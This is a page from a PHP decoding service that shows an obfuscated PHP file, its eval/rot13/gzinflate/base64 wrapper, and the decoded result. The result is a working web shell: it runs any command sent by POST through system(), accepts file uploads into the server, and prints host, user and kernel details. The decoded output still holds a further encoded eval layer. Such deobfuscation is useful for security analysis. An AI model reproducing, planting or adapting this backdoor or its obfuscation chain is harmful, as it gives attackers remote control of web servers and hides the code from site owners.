Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
eval(str_rot13(gzinflate(base64_decode('DZVFDuwGEESPkx95YSZFWZjGzOxNZGb2mE6f6Qu0qrrq9dZOz5..
Decoded Output download
error_reporting(E_ALL);
set_magic_quotes_runtime(0);
error_reporting(0);
eval(str_rot13(gzinflate(base64_decode('jdFHzptAAEDhfaScI45YYJqxFWVhOjbFdIbNL8AMxZgyDBg4fSLlAnlH+B6qu+0Ay+KryEqKOeD3kk5bV6JD30F0Yr9GNGQjOvxwhiAasrCxLEd6c57gPB+YreX1NntKbhnhwx6CduVMF6c9xU817KNxfrzElN6HntbnLumzspc4l89oo5k2RV8nrTXhEm0k87rVw36EZA3QVsqLOeaZIfDVsi4FGwOzCWvMB1NakJaxvcu41aWCYg3hSFDQ9QbkMIaXvSs2nR061kfgu/Kte1HpZ1+J25iBYu62Fya6wLCDC3bV61mh8qtyXa5S8DzdtOiyx1g/qaLGWzY612bGQJyhqToHcp1Ym6+SV24XACrdXFIG0Z2Xol23GizxiBl9kpuiwGemr8mB/PHzb7++f0P/6VrqtqickyYAR/EyU0sMFKeC9MfnhBN9N9Ec6MfHfnLzh5JntFlSe3dk04Hpuhs230dvqsiN7JPQasomAhKr5S6rmDfshaUvLCIzVgX6CL2DB80Dyv1+taC3TmeD6M6NAxN9yUf7YRH+Ooq5emnFoDRlN46pmoCGGr22pKVXM13j+CR5wQgHTUviTobTKPWCrp0HLBGgVdtt2QdgRVMPzBfpYNSadXgfnoRNrUCRr7GnP9mQPSFYjF4AC3gXb0e6TqkMUYwSPikqFOfED6BcRa19n+eBaXyQxDPXHN2PLlAWAJbBcXKjcvYpjRK/wjYdlg8P9jjsUk5PH+jdIpkv710nIo66MAtjZf7ac3HX9EWCmtc1S/h9EyJli3PtvhhPqebFVpS5N6+Y+sur1PRSXyTt97+HfwA='))));
echo " <b>Host:</b> ".$_SERVER["HTTP_HOST"]."<br>";
echo " <b>IP:</b> ".gethostbyname($_SERVER["HTTP_HOST"])."<br>";
echo " <b>Your ip:</b> ".$_SERVER["REMOTE_ADDR"]." <br>";
$currentWD = str_replace("\","\",$_POST['_cwd']);
$currentCMD = str_replace("\","\",$_POST['_cmd']);
$UName = `uname -a`;
$SCWD = `pwd`;
$UserID = `id`;
if( $currentWD == "" ) {
$currentWD = $SCWD;
}
if( $_POST['_act'] == "List files!" ) {
$currentCMD = "ls -la";
}
echo "<form method=post enctype=\"multipart/form-data\"><table>";
echo "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
echo "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
echo "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
echo "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
echo "<tr><td><b>Upload file:</b></td><td><input size=89 type=file name=_upl></td>";
echo "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
echo "</table></form>";
$currentCMD = str_replace("\"","\"",$currentCMD);
$currentCMD = str_replace("\'","\'",$currentCMD);
if( $_POST['_act'] == "Upload!" ) {
if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
echo "<center><b>Error while uploading file!</b></center>";
} else {
echo "<center><pre>";
system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
echo "</pre><b>File uploaded successfully!</b></center>";
}
} else {
echo "
<!-- OUTPUT STARTS HERE -->
<pre>
";
$currentCMD = "cd ".$currentWD.";".$currentCMD;
system("$currentCMD 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
echo "
</pre>
<!-- OUTPUT ENDS HERE -->
</center><center><b>Perintah Selesai Gan!</b></center>";
}
exit;
Did this file decode correctly?
Original Code
eval(str_rot13(gzinflate(base64_decode('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'))))
Function Calls
gzinflate | 2 |
str_rot13 | 2 |
base64_decode | 2 |
Stats
MD5 | 26d498389a1fc3d2c21dcfeed25a41ce |
Eval Count | 2 |
Decode Time | 90 ms |